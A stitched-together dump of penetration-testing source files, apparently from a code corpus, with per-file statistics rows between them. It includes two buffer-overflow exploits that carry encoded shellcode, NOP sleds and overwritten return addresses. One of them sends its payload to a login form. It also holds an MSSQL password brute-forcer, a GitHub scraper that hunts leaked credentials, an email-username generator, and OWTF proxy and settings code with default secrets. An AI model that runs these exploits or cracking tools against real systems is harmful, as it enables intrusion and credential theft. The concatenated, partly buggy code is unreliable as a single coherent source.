buf += "\xce\x63\xe5\x9b\xff\xe3\xe1\xe4\x1d\x94\x0e\x3f\xa6"
buf += "\xa4\x44\x1d\x8f\x2c\x01\xf4\x8d\x30\xb2\x23\xd1\x4c"
buf += "\x31\xc1\xaa\xaa\x29\xa0\xaf\xf7\xed\x59\xc2\x68\x98"
buf += "\x5d\x71\x88\x89"
junk = 'A'*780
eip = '\x83\x0c\x09\x10'
nops = '\x90'*20
injection = junk + eip + nops + buf
payload="username="+injection+"&password=A"
buffer="POST /login HTTP/1.1\r\n"
buffer+="Host: 192.168.129.128\r\n"
buffer+="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r 2;n"
buffer+="Referer: http://192.168.129.128/login\r\n"
buffer+="Connection: close\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="Content-Length: "+str(len(payload))+"\r\n"
buffer+="\r\n"
buffer+=payload
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.129.128", 80))
s.send(buffer)
s.close()
| 41.898305 | 94 | 0.677075 |
PenetrationTestingScripts | #coding=utf-8
import time
import threading
from printers import printPink,printGreen
from multiprocessing.dummy import Pool
import pymssql
class mssql_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/mssql.conf")
def mssql_connect(self,ip,username,password,port):
crack =0
try:
db=pymssql.connect(host=str(ip)+':'+str(port),user=username,password=password)
if db:
crack=1
db.close()
except Exception, e:
self.lock.acquire()
print "%s sql service 's %s:%s login fail " %(ip,username,password)
self.lock.release()
return crack
def mssq1(self,ip,port):
try:
for data in self.lines:
username=data.split(':')[0]
password=data.split(':')[1]
flag=mssql_connect(ip,username,password,port)
if flag==2:
break
if flag==1:
self.lock.acquire()
printGreen("%s mssql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.result.append("%s mssql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
break
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['mysql']):
printPink("crack sql serice now...")
print "[*] start crack sql serice %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['mssql']:
pool.apply_async(func=self.mssq1,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop crack sql serice %s" % time.ctime()
print "[*] crack sql serice done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
| 32.617647 | 127 | 0.514661 |
owtf | """
owtf.proxy.gen_cert
~~~~~~~~~~~~~~~~~~~
Inbound Proxy Module developed by Bharadwaj Machiraju (blog.tunnelshade.in) as a part of Google Summer of Code 2013
"""
import hashlib
import os
import re
from OpenSSL import crypto
from owtf.lib.filelock import FileLock
from owtf.utils.strings import utf8
def gen_signed_cert(domain, ca_crt, ca_key, ca_pass, certs_folder):
    """ This function takes a domain name as a parameter and then creates a certificate and key with the
    domain name(replacing dots by underscores), finally signing the certificate using specified CA and
    returns the path of key and cert files. If you are yet to generate a CA then check the top comments
    :param domain: domain for the cert
    :type domain: `str`
    :param ca_crt: ca.crt file path
    :type ca_crt: `str`
    :param ca_key: ca.key file path
    :type ca_key: `str`
    :param ca_pass: Password for the certificate
    :type ca_pass: `str`
    :param certs_folder:
    :type certs_folder: `str`
    :return: Key and cert path
    :rtype: `str`
    """
    key_path = os.path.join(
        certs_folder, re.sub("[^-0-9a-zA-Z_]", "_", domain) + ".key"
    )
    cert_path = os.path.join(
        certs_folder, re.sub("[^-0-9a-zA-Z_]", "_", domain) + ".crt"
    )
    # The first conditions checks if file exists, and does nothing if true
    # If file doesn't exist lock is obtained for writing (Other processes in race must wait)
    # After obtaining lock another check to handle race conditions gracefully
    if os.path.exists(key_path) and os.path.exists(cert_path):
        pass
    else:
        with FileLock(cert_path, timeout=2):
            # Check happens if the certificate and key pair already exists for a domain
            if os.path.exists(key_path) and os.path.exists(cert_path):
                pass
            else:
                # Serial Generation - Serial number must be unique for each certificate,
                # so serial is generated based on domain name
                md5_hash = hashlib.md5()
                md5_hash.update(utf8(domain))
                serial = int(md5_hash.hexdigest(), 36)
                # The CA stuff is loaded from the same folder as this script.
                # FIX: read via context managers -- the previous bare
                # open(...).read() calls leaked both file handles.
                with open(ca_crt, "rb") as ca_crt_file:
                    ca_cert = crypto.load_certificate(
                        crypto.FILETYPE_PEM, ca_crt_file.read()
                    )
                # The last parameter is the password for your CA key file
                with open(ca_key, "rb") as ca_key_file:
                    ca_key = crypto.load_privatekey(
                        crypto.FILETYPE_PEM,
                        ca_key_file.read(),
                        passphrase=utf8(ca_pass),
                    )
                key = crypto.PKey()
                key.generate_key(crypto.TYPE_RSA, 4096)
                cert = crypto.X509()
                cert.get_subject().C = "US"
                cert.get_subject().ST = "Pwnland"
                cert.get_subject().L = "127.0.0.1"
                cert.get_subject().O = "OWTF"
                cert.get_subject().OU = "Inbound-Proxy"
                cert.get_subject().CN = domain
                cert.gmtime_adj_notBefore(0)
                cert.gmtime_adj_notAfter(365 * 24 * 60 * 60)
                cert.set_serial_number(serial)
                cert.set_issuer(ca_cert.get_subject())
                cert.set_pubkey(key)
                cert.sign(ca_key, "sha256")
                # The key and cert files are dumped and their paths are returned
                with open(key_path, "wb") as domain_key:
                    domain_key.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, key))
                with open(cert_path, "wb") as domain_cert:
                    domain_cert.write(
                        crypto.dump_certificate(crypto.FILETYPE_PEM, cert)
                    )
    return key_path, cert_path
| 38.092784 | 115 | 0.5732 |
owtf | """
owtf.models.user_login_token
~~~~~~~~~~~~~~~~
"""
from sqlalchemy import Column, Integer, String, ForeignKey, DateTime, UniqueConstraint
from owtf.db.model_base import Model
import uuid
from datetime import datetime, timedelta
from owtf.settings import JWT_EXP_DELTA_SECONDS
from owtf.models.user import User
class UserLoginToken(Model):
    """ORM model holding issued login tokens, one row per active token."""
    __tablename__ = "user_login_tokens"
    # Surrogate primary key.
    id = Column(Integer, primary_key=True, autoincrement=True)
    # Owning user (FK to users table).
    user_id = Column(Integer, ForeignKey(User.id))
    # The opaque token string presented by the client.
    token = Column(String, nullable=False)
    @classmethod
    def find_by_userid_and_token(cls, session, user_id, token):
        """Find a stored login token by user_id and token value.
        Returns None if not found.
        """
        return session.query(UserLoginToken).filter_by(user_id=user_id, token=token).first()
    @classmethod
    def add_user_login_token(cls, session, token, user_id):
        """Adds an user_login_token to the DB"""
        # Tokens arrive as bytes; stored decoded as ASCII text.
        new_token = cls(user_id=user_id, token=token.decode("ascii"))
        session.add(new_token)
        session.commit()
    @classmethod
    def delete_user_login_token(cls, session, token):
        """Delete the user_login_token from the DB"""
        # Silently a no-op when the token does not exist.
        token_obj = session.query(cls).filter_by(token=token).first()
        if token_obj is not None:
            session.delete(token_obj)
            session.commit()
| 31.5 | 92 | 0.66349 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
# Payload generator
## Total payload length
payload_length = 424
## Amount of nops
nop_length = 100
## Controlled memory address to return to in Little Endian format
#0x7fffffffddc0
#0x7fffffffe120
#current 0x7fffffffdf80: 0xffffdfa0
#0x7fffffffdde0
#return_address = '\x20\xe1\xff\xff\xff\x7f\x00\x00'
#IT must be noted that return address is $rsp
#00007fffffffde30
return_address = '\xe0\xdd\xff\xff\xff\x7f\x00\x00'
## Building the nop slide
nop_slide = "\x90" * nop_length
## Malicious code injection (msfvenom-generated shellcode)
buf = ""
buf += "\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05"
buf += "\xef\xff\xff\xff\x48\xbb\xfa\x6e\x99\x49\xdc\x75\xa8"
buf += "\x43\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += "\x90\x47\xc1\xd0\xb6\x77\xf7\x29\xfb\x30\x96\x4c\x94"
buf += "\xe2\xe0\xfa\xf8\x6e\x88\x15\xa3\x75\xa8\x42\xab\x26"
buf += "\x10\xaf\xb6\x65\xf2\x29\xd0\x36\x96\x4c\xb6\x76\xf6"
buf += "\x0b\x05\xa0\xf3\x68\x84\x7a\xad\x36\x0c\x04\xa2\x11"
buf += "\x45\x3d\x13\x6c\x98\x07\xf7\x66\xaf\x1d\xa8\x10\xb2"
buf += "\xe7\x7e\x1b\x8b\x3d\x21\xa5\xf5\x6b\x99\x49\xdc\x75"
buf += "\xa8\x43"
## Building the padding between buffer overflow start and return address
## so the total payload is exactly payload_length bytes.
padding = 'B' * (payload_length - nop_length - len(buf))
# Emit the final payload on stdout: [nops][shellcode][padding][ret addr].
print nop_slide + buf + padding + return_address
| 31.65 | 72 | 0.710345 |
owtf | from owtf.config import config_handler
from owtf.plugin.params import plugin_params
from owtf.protocols.smb import SMB
DESCRIPTION = "Mounts and/or uploads/downloads files to an SMB share -i.e. for IDS testing-"
def run(PluginInfo):
    """Auxiliary plugin entry point: mount an SMB share, transfer files, unmount.

    For every argument set supplied by the user the share is mounted and the
    configured uploads/downloads run; the share is unmounted afterwards unless
    the connection was already closed.
    """
    Content = []
    smb = SMB()
    mandatory_args = {
        "SMB_HOST": config_handler.get_val("SMB_HOST_DESCRIP"),
        "SMB_SHARE": config_handler.get_val("SMB_SHARE_DESCRIP"),
        "SMB_MOUNT_POINT": config_handler.get_val("SMB_MOUNT_POINT_DESCRIP"),
    }
    optional_args = {
        "SMB_USER": config_handler.get_val("SMB_USER_DESCRIP"),
        "SMB_PASS": config_handler.get_val("SMB_PASS_DESCRIP"),
        "SMB_DOWNLOAD": config_handler.get_val("SMB_DOWNLOAD_DESCRIP"),
        "SMB_UPLOAD": config_handler.get_val("SMB_UPLOAD_DESCRIP"),
        "REPEAT_DELIM": config_handler.get_val("REPEAT_DELIM_DESCRIP"),
    }
    args = {
        "Description": DESCRIPTION,
        "Mandatory": mandatory_args,
        "Optional": optional_args,
    }
    # Distinct name for the loop variable (the original shadowed `args`).
    for arg_set in plugin_params.get_args(args, PluginInfo):
        plugin_params.set_config(arg_set)  # Sets the auxiliary plugin arguments as config
        smb.Mount(arg_set, PluginInfo)
        smb.Transfer()
    if not smb.IsClosed():  # Ensure clean exit if reusing connection
        smb.UnMount(PluginInfo)
    return Content
| 37.205882 | 92 | 0.6302 |
PenetrationTestingScripts | # -*- coding: utf-8 -*-
import configparser
import os
import re
import smtplib
import sqlite3
import sys
import traceback
from email import encoders
from email.header import Header
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import formataddr, parseaddr
from time import gmtime, sleep, strftime
import requests
from lxml import etree
from lxml.html import tostring
from tqdm import tqdm
'''
工具名:GithubHunter
作者:Allen_Zhang
主要用途:本工具主要是查询Github中可能泄露的代码,用户名,密码,数据库信息,网络结构信息等
实现方法:通过登陆Github后,搜索关键词,然后呈现数据
'''
def login_github(username,password):# Log in to GitHub and return an authenticated session
    """Authenticate against github.com with the given credentials.

    Returns a requests.Session carrying the logged-in cookies, or None when
    login fails (the exception is persisted via error_Record).
    """
    # Login endpoints
    login_url = 'https://github.com/login'
    session_url = 'https://github.com/session'
    try:
        # Fetch the login page and scrape the CSRF token from the form
        s = requests.session()
        resp = s.get(login_url).text
        dom_tree = etree.HTML(resp)
        # NOTE(review): xpath() returns a list; requests form-encodes its single
        # element so login works, but key[0] would be the conventional value.
        key = dom_tree.xpath('//input[@name="authenticity_token"]/@value')
        user_data = {
            'commit': 'Sign in',
            'utf8': '✓',
            'authenticity_token': key,
            'login': username,
            'password': password
        }
        # Post the credentials and warm the session
        s.post(session_url,data=user_data)
        s.get('https://github.com/settings/profile')
        return s
    except Exception as e:
        print('产生异常,请检查网络设置及用户名和密码')
        error_Record(str(e), traceback.format_exc())
def hunter(gUser, gPass, keywords):# Search GitHub code for each keyword and collect leaked snippets
    """Log in, search GitHub code for each keyword, and collect results.

    Populates the module-level `tUrls` (links to leaking files) and `codes`
    (matching HTML code fragments) and returns them as (tUrls, codes).
    """
    print('''\033[1;34;0m        #####                        #       #     #                                    
 #     # # ##### #    # #    # #####  #     # #    # #    # ##### ###### ##### 
 #       #   #   #    # #    # #    # #     # #    # ##    # #   #      #    # 
 #  #### #   #   ###### #    # #####  ####### #    # # #  # #   #   #####  #    # 
 #     # #   #   #    # #    # #    # #     # #    # #  # # #   #   #      #####  
 #     # #   #   #    # #    # #    # #     # #    # #   ## #   #   #      #   #  
  #####  #   #   #    # #####  #####  #     #  ####  #    # #   #   ###### #    # V1.2
                                   Created by Allen \r\n\r\n\033[0m''')
    global codes
    global tUrls
    try:
        # Code search
        s = login_github(gUser,gPass)
        print('登陆成功,正在检索泄露信息.......')
        sleep(1)
        codes = []
        tUrls = []
        # Two regexes: the first captures the rendered code fragment,
        # the second re-tags <em> so matched keywords render in red.
        pattern_code = re.compile(r'<div class="file-box blob-wrapper">(.*?)</div>', re.S)
        pattern_sub = re.compile(r'<em>', re.S)
        for keyword in keywords:
            for page in tqdm(range(1,7)):
                # Search URL sorted by most recently indexed; leak URLs are
                # still extracted with xpath below.
                search_code = 'https://github.com/search?o=desc&p=' + str(page) + '&q=' + keyword +'&s=indexed&type=Code'
                resp = s.get(search_code)
                results_code = resp.text
                dom_tree_code = etree.HTML(results_code)
                # Collect links to the files that may leak information
                Urls = dom_tree_code.xpath('//div[@class="flex-auto min-width-0 col-10"]/a[2]/@href')
                for url in Urls:
                    url = 'https://github.com' + url
                    tUrls.append(url)
                # Grab the top-level DIV holding each snippet, stringify it,
                # then regex out the inner code container.
                results = dom_tree_code.xpath('//div[@class="code-list-item col-12 py-4 code-list-item-public "]')
                for div in results:
                    result = etree.tostring(div, pretty_print=True, method="html")
                    code = str(result, encoding='utf-8')
                    # If the marker div is present, extract the leaked code;
                    # otherwise store an empty placeholder to keep lists aligned.
                    if '<div class="file-box blob-wrapper">' in code:
                        data = pattern_code.findall(code)
                        codes.append(pattern_sub.sub('<em style="color:red">', data[0]))
                    else:
                        codes.append(' ')
        return tUrls, codes
    except Exception as e:
        # On failure, record to error.txt and echo the exception
        error_Record(str(e), traceback.format_exc())
        print(e)
def insert_DB(url, code):
    """Persist one leaked-code record into the local SQLite baseline.

    Creates the ``Baseline`` table on first use and upserts by URL
    (``INSERT OR REPLACE`` on the primary key), so re-running the monitor
    never produces duplicate rows.

    :param url: GitHub URL of the leaked file (primary key).
    :param code: HTML snippet of the leaked code associated with the URL.
    """
    try:
        conn = sqlite3.connect('hunter.db')
        cursor = conn.cursor()
        cursor.execute('CREATE TABLE IF NOT EXISTS Baseline (url varchar(1000) primary key, code varchar(10000))')
        cursor.execute('INSERT OR REPLACE INTO Baseline (url, code) values (?,?)', (url, code))
        # Bug fix: was `cursor.close` (bare attribute access — the cursor was
        # never actually closed).
        cursor.close()
        conn.commit()
        conn.close()
    except Exception as e:
        print("数据库操作失败!\n")
        error_Record(str(e), traceback.format_exc())
        print(e)
def compare_DB_Url(url):
    """Look up *url* in the SQLite baseline.

    :param url: candidate leak URL.
    :return: list of matching (url,) rows — empty when the URL is new,
             or None if the query failed.
    """
    try:
        connection = sqlite3.connect('hunter.db')
        try:
            rows = connection.execute('SELECT url from Baseline where url = ?', (url,)).fetchall()
            connection.commit()
        finally:
            connection.close()
        return rows
    except Exception as exc:
        error_Record(str(exc), traceback.format_exc())
        print(exc)
def error_Record(error, tb):
    """Append a timestamped exception record to ``error.txt``.

    :param error: short description of the exception (usually ``str(e)``).
    :param tb: full traceback text (``traceback.format_exc()``).
    """
    try:
        # Open mode 'a' creates the file when it is missing, so the original
        # exists/'w' vs 'a' branch (two identical writes) is unnecessary.
        with open('error.txt', 'a', encoding='utf-8') as f:
            f.write(strftime("%a, %d %b %Y %H:%M:%S",gmtime()) + "-" + "Exception Record: " + error + '\n' + "具体错误信息如下:\n" +tb + '\r\n')
    except Exception as e:
        print(e)
def send_mail(host, username, password, sender, receivers, message):
    """Send the HTML alert *message* to *receivers* through SMTP (port 25).

    Failures are recorded via error_Record and printed rather than raised.
    """

    def _format_addr(address):
        # Encode the display name so a non-ASCII sender name survives transport.
        display_name, mail_addr = parseaddr(address)
        return formataddr((Header(display_name, 'utf-8').encode(), mail_addr))

    mail = MIMEText(message, 'html', 'utf-8')
    mail['Subject'] = Header('Github信息泄露监控通知', 'utf-8').encode()
    mail['From'] = _format_addr('Github信息泄露监控<%s>' % sender)
    mail['To'] = ','.join(receivers)
    try:
        connection = smtplib.SMTP(host, 25)
        connection.login(username, password)
        connection.sendmail(sender, receivers, mail.as_string())
        print('邮件发送成功!')
        connection.close()
    except Exception as err:
        error_Record(str(err), traceback.format_exc())
        print(err)
if __name__ == '__main__':
    # Read credentials, mail settings and search terms from info.ini.
    config = configparser.ConfigParser()
    config.read('info.ini')
    g_User = config['Github']['user']
    g_Pass = config['Github']['password']
    host = config['EMAIL']['host']
    m_User = config['EMAIL']['user']
    m_Pass = config['EMAIL']['password']
    m_sender = config['SENDER']['sender']
    receivers = []
    for k in config['RECEIVER']:
        receivers.append(config['RECEIVER'][k])
    keywords = []
    # Combine every keyword with every payload joined by "+", matching
    # GitHub's code-search syntax.
    for keyword in config['KEYWORD']:
        for payload in config['PAYLOADS']:
            keywords.append(config['KEYWORD'][keyword] + '+' + config['PAYLOADS'][payload])
    message = 'Dear all<br><br>未发现任何新增敏感信息!'
    tUrls, codes= hunter(g_User, g_Pass, keywords)
    target_codes = []
    # First run: build a baseline database. Later runs: only report entries
    # that are not yet in the baseline.
    if os.path.exists('hunter.db'):
        print("存在数据库文件,进行新增数据查找......")
        # Split the combined term back into keyword and payload; a snippet
        # must contain both before the database lookup is attempted.
        for keyword in keywords:
            payload = keyword.split('+')
            for i in range(0, len(tUrls)):
                if (payload[0] in codes[i]) and (payload[1] in codes[i]):
                    # An empty DB result means this URL is new: queue it for
                    # the alert mail and add it to the baseline.
                    if not compare_DB_Url(tUrls[i]):
                        target_codes.append('<br><br><br>' + '链接:' + tUrls[i] + '<br><br>')
                        target_codes.append('简要代码如下:<br><div style="border:1px solid #bfd1eb;background:#f3faff">' + codes[i] + '</div>')
                        insert_DB(tUrls[i], codes[i])
    else:
        print("未发现数据库文件,创建并建立基线......")
        for keyword in keywords:
            payload = keyword.split('+')
            for i in range(0, len(tUrls)):
                # Record every keyword+payload hit to form the baseline.
                if (payload[0] in codes[i]) and (payload[1] in codes[i]):
                    target_codes.append('<br><br><br>' + '链接:' +tUrls[i] + '<br><br>')
                    target_codes.append('简要代码如下:<br><div style="border:1px solid #bfd1eb;background:#f3faff">' + codes[i] + '</div>')
                    insert_DB(tUrls[i], codes[i])
    # Any queued entries trigger the alert mail (two list items per finding);
    # otherwise send the "nothing new" notice.
    if target_codes:
        warning = ''.join(target_codes)
        result = 'Dear all<br><br>发现信息泄露! ' + '一共发现{}条'.format(int(len(target_codes)/2)) + warning
        send_mail(host, m_User, m_Pass, m_sender, receivers, result)
    else:
        send_mail(host, m_User, m_Pass, m_sender, receivers, message)
| 39.090909 | 140 | 0.524663 |
cybersecurity-penetration-testing | import sys
# Python 2 script: generate common e-mail username permutations from a list
# of "First [Middle] Last" names, one per line, appending a mail suffix.
if len(sys.argv) !=3:
    print "usage: %s name.txt email suffix" % (sys.argv[0])
    sys.exit(0)
for line in open(sys.argv[1]):
    # Keep only letters and spaces (drops digits and punctuation).
    name = ''.join([c for c in line if c == " " or c.isalpha()])
    tokens = name.lower().split()
    # NOTE(review): a blank line leaves tokens empty and raises IndexError
    # here — confirm the input file has one non-empty name per line.
    fname = tokens[0]
    lname = tokens[-1]
    # Emit the usual first/last combinations, dotted forms and initials.
    print fname +lname+sys.argv[2]
    print lname+fname+sys.argv[2]
    print fname+"."+lname+sys.argv[2]
    print lname+"."+fname+sys.argv[2]
    print lname+fname[0]+sys.argv[2]
    print fname+lname+fname+sys.argv[2]
    print fname[0]+lname+sys.argv[2]
    print fname[0]+"."+lname+sys.argv[2]
    print lname[0]+"."+fname+sys.argv[2]
    print fname+sys.argv[2]
    print lname+sys.argv[2]
print lname+sys.argv[2] | 29.047619 | 61 | 0.660317 |
owtf | """
owtf.settings
~~~~~~~~~~~~~
It contains all the owtf global configs.
"""
import os
import re
# Python 2 compatibility: FileNotFoundError only exists on Python 3, so fall
# back to IOError (its Python 2 equivalent for the open() failure below).
try:
    FileNotFoundError
except NameError:
    FileNotFoundError = IOError
import yaml
# Base directories: user config lives under ~/.owtf, packaged defaults under
# the installed package tree.
HOME_DIR = os.path.expanduser("~")
OWTF_CONF = os.path.join(HOME_DIR, ".owtf")
ROOT_DIR = os.path.dirname(os.path.realpath(__file__))
CONFIG_DIR = os.path.join(ROOT_DIR, "data", "conf")
DEBUG = True
# Used by tools like dirbuster to launch gui or cli versions
INTERACTIVE = True
# Database config when used in docker
if os.environ.get("DOCKER", None):
    DATABASE_NAME = os.environ["POSTGRES_DB"]
    DATABASE_PASS = os.environ["POSTGRES_PASSWORD"]
    DATABASE_USER = os.environ["POSTGRES_USER"]
    DATABASE_IP = "db"
    DATABASE_PORT = 5432
else:
    # Change this if you deploy OWTF to a public facing server
    DATABASE_PASS = "jgZKW33Q+HZk8rqylZxaPg1lbuNGHJhgzsq3gBKV32g="
    DATABASE_NAME = "owtf_db"
    DATABASE_USER = "owtf_db_user"
    DATABASE_IP = os.environ.get("POSTGRES_HOST","127.0.0.1")
    DATABASE_PORT = 5432
# API and UI Server
SERVER_ADDR = "0.0.0.0"
SERVER_PORT = 8009
FILE_SERVER_PORT = 8010
# Default API version
DEFAULT_API_VERSION = "v1"
# Application secret
# Change this
APP_SECRET = "changeme"
SESSION_COOKIE_NAME = "owtf-session"
# CORS settings. Fine grained, do not override if possible.
SIMPLE_HEADERS = ["accept", "accept-language", "content-language"]
# Bug fix: the first origin was "http:/localhost:8009" (missing slash), which
# can never match a browser-sent Origin header.
ALLOWED_ORIGINS = ["http://localhost:8009", "http://localhost:8010"]
ALLOWED_METHODS = ["GET", "POST", "DELETE"]
SEND_CREDENTIALS = False
# ERROR reporting
USE_SENTRY = False
SENTRY_API_KEY = ""
# IMP PATHS
WEB_TEST_GROUPS = os.path.join(OWTF_CONF, "conf", "profiles", "plugin_web", "groups.cfg")
NET_TEST_GROUPS = os.path.join(OWTF_CONF, "conf", "profiles", "plugin_net", "groups.cfg")
AUX_TEST_GROUPS = os.path.join(OWTF_CONF, "conf", "profiles", "plugin_aux", "groups.cfg")
PLUGINS_DIR = os.path.join(ROOT_DIR, "plugins")
# Output Settings
OUTPUT_PATH = "owtf_review"
AUX_OUTPUT_PATH = "owtf_review/auxiliary"
NET_SCANS_PATH = "owtf_review/scans"
# The name of the directories relative to output path
TARGETS_DIR = "targets"
WORKER_LOG_DIR = "logs"
# Default profile settings
DEFAULT_GENERAL_PROFILE = os.path.join(OWTF_CONF, "conf", "general.yaml")
DEFAULT_FRAMEWORK_CONFIG = os.path.join(OWTF_CONF, "conf", "framework.yaml")
DEFAULT_RESOURCES_PROFILE = os.path.join(OWTF_CONF, "conf", "resources.cfg")
DEFAULT_WEB_PLUGIN_ORDER_PROFILE = os.path.join(OWTF_CONF, "conf", "profiles", "plugin_web", "order.cfg")
DEFAULT_NET_PLUGIN_ORDER_PROFILE = os.path.join(OWTF_CONF, "conf", "profiles", "plugin_net", "order.cfg")
# logs_dir can be both relative or absolute path ;)
LOGS_DIR = "logs"
# Used for logging in OWTF
OWTF_LOG_FILE = "/tmp/owtf.log"
# Interface static folders
TEMPLATES = os.path.join(OWTF_CONF, "build")
STATIC_ROOT = os.path.join(OWTF_CONF, "build")
# SMTP (Make changes here to setup SMTP server of your choice)
EMAIL_FROM = None  # Your SMTP From Mail
SMTP_LOGIN = None  # Your SMTP Login
SMTP_PASS = None  # Your Password
SMTP_HOST = None  # Your Mail Server
SMTP_PORT = None  # Your SMTP Port
# OUTBOUND PROXY
USE_OUTBOUND_PROXY = False
OUTBOUND_PROXY_IP = ""
OUTBOUND_PROXY_PORT = ""
OUTBOUND_PROXY_AUTH = None
# Inbound Proxy Configuration
INBOUND_PROXY_IP = "127.0.0.1"
INBOUND_PROXY_PORT = 8008
INBOUND_PROXY_PROCESSES = 0
INBOUND_PROXY_CACHE_DIR = "/tmp/owtf/proxy-cache"
# MITM proxy CA certificate material (generated under ~/.owtf/proxy/certs).
CA_CERT = os.path.join(OWTF_CONF, "proxy", "certs", "ca.crt")
CA_KEY = os.path.join(OWTF_CONF, "proxy", "certs", "ca.key")
CA_PASS_FILE = os.path.join(OWTF_CONF, "proxy", "certs", "ca_pass.txt")
CERTS_FOLDER = os.path.join(OWTF_CONF, "proxy", "certs")
# Analytics cookies the proxy should drop / keep.
BLACKLIST_COOKIES = ["_ga", "__utma", "__utmb", "__utmc", "__utmz", "__utmv"]
WHITELIST_COOKIES = ""
# Hop-by-hop / transport headers the proxy must not forward verbatim.
PROXY_RESTRICTED_RESPONSE_HEADERS = [
    "Content-Length",
    "Content-Encoding",
    "Etag",
    "Transfer-Encoding",
    "Connection",
    "Vary",
    "Accept-Ranges",
    "Pragma",
]
PROXY_RESTRICTED_REQUEST_HEADERS = [
    "Connection",
    "Pragma",
    "Cache-Control",
    "If-Modified-Since",
]
PROXY_LOG = "/tmp/owtf/proxy.log"
# Define regex patterns. Raw strings are used so backslash escapes such as
# \? \. \d \w \s reach the regex engine verbatim — in a normal string these
# are invalid escape sequences, which Python 3 only tolerates with a
# DeprecationWarning (slated to become an error). The resulting pattern
# text is unchanged.
REGEXP_FILE_URL = (
    r"^[^\?]+\.(xml|exe|pdf|cs|log|inc|dat|bak|conf|cnf|old|zip|7z|rar|tar|gz|bz2|txt|xls|xlsx|doc|docx|ppt|pptx)$"
)
# Potentially small files will be retrieved for analysis
REGEXP_SMALL_FILE_URL = r"^[^\?]+\.(xml|cs|inc|dat|bak|conf|cnf|old|txt)$"
REGEXP_IMAGE_URL = r"^[^\?]+\.(jpg|jpeg|png|gif|bmp)$"
# NOTE(review): the names below look swapped — REGEXP_VALID_URL matches SSI
# extensions while REGEXP_SSI_URL matches generic http/ftp URLs. Values are
# kept as-is because consumers (is_url_regex / is_ssi_regex) depend on them.
REGEXP_VALID_URL = r"^[^\?]+\.(shtml|shtm|stm)$"
REGEXP_SSI_URL = r"^(http|ftp)[^ ]+$"
REGEXP_PASSWORD = r"^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@$!%*#?&])[A-Za-z\d@$!#%*?&]{8,20}$"
REGEXP_EMAIL = r"^[a-z0-9]+[\._]?[a-z0-9]+[@]\w+[-]?\w+[.]\w{2,3}$"
# Compile regular expressions once at the beginning for speed purposes:
is_file_regex = re.compile(REGEXP_FILE_URL, re.IGNORECASE)
is_small_file_regex = re.compile(REGEXP_SMALL_FILE_URL, re.IGNORECASE)
is_image_regex = re.compile(REGEXP_IMAGE_URL, re.IGNORECASE)
is_url_regex = re.compile(REGEXP_VALID_URL, re.IGNORECASE)
is_ssi_regex = re.compile(REGEXP_SSI_URL, re.IGNORECASE)
is_password_valid_regex = re.compile(REGEXP_PASSWORD)
is_email_valid_regex = re.compile(REGEXP_EMAIL, re.IGNORECASE)
# UI
SERVER_LOG = "/tmp/owtf/ui_server.log"
FILE_SERVER_LOG = "/tmp/owtf/file_server.log"
# HTTP_AUTH
HTTP_AUTH_HOST = None
HTTP_AUTH_USERNAME = None
HTTP_AUTH_PASSWORD = None
HTTP_AUTH_MODE = "basic"
# Memory
RESOURCE_MONITOR_PROFILER = 0
PROCESS_PER_CORE = 1
MIN_RAM_NEEDED = 20
# misc
DATE_TIME_FORMAT = "%d/%m/%Y-%H:%M"
# Delimiter used to mark replacement placeholders inside config values.
REPLACEMENT_DELIMITER = "@@@"
REPLACEMENT_DELIMITER_LENGTH = len(REPLACEMENT_DELIMITER)
CONFIG_TYPES = ["string", "other"]
USER_AGENT = "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/15.0"
PROXY_CHECK_URL = "http://www.google.ie"
# Fallback
# Packaged defaults used when the user's ~/.owtf copies are missing.
FALLBACK_WEB_TEST_GROUPS = os.path.join(ROOT_DIR, "data", "conf", "profiles", "plugin_web", "groups.cfg")
FALLBACK_NET_TEST_GROUPS = os.path.join(ROOT_DIR, "data", "conf", "profiles", "plugin_net", "groups.cfg")
FALLBACK_AUX_TEST_GROUPS = os.path.join(ROOT_DIR, "data", "conf", "profiles", "plugin_aux", "groups.cfg")
FALLBACK_PLUGINS_DIR = os.path.join(ROOT_DIR, "data", "plugins")
FALLBACK_GENERAL_PROFILE = os.path.join(ROOT_DIR, "data", "conf", "general.yaml")
FALLBACK_FRAMEWORK_CONFIG = os.path.join(ROOT_DIR, "data", "conf", "framework.yaml")
FALLBACK_RESOURCES_PROFILE = os.path.join(ROOT_DIR, "data", "conf", "resources.cfg")
FALLBACK_WEB_PLUGIN_ORDER_PROFILE = os.path.join(ROOT_DIR, "data", "conf", "profiles", "plugin_web", "order.cfg")
FALLBACK_NET_PLUGIN_ORDER_PROFILE = os.path.join(ROOT_DIR, "data", "conf", "profiles", "plugin_net", "order.cfg")
# Override the values
# Executes ~/.owtf/settings.py (if present) in this module's namespace so
# users can override any constant above. NOTE: this runs arbitrary code from
# the user's home directory — acceptable for a local tool, by design here.
local_conf = os.path.join(OWTF_CONF, "settings.py")
try:
    with open(local_conf) as f:
        settings = compile(f.read(), local_conf, "exec")
        exec(settings, globals(), locals())
except FileNotFoundError:
    pass
# JWT
JWT_SECRET_KEY = "changeme"  # Add your JWT_SECRET_KEY here
JWT_ALGORITHM = "HS256"
